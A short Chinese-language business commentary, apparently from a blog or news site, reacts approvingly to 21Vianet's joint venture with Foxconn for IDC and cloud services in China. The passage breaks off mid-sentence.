    10月10日,世纪互联与(Foxcon)签约成立合资公司,有感。 全球电子制造业巨头(全球500强企业)与世纪互联共同看好IDC、云计算等业务在中国的增长空间,双方迅速果断出手,在资本层面上达成合作,此举体现了全球电子制造业巨头对世纪互联IDC业务的欣赏与信任,另一方面反映出世纪互联目前良好的运营状况与广阔的发展前景。 众所周知,精于电子产品制造(世界第一),对于世纪互联而言,能够与结盟
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他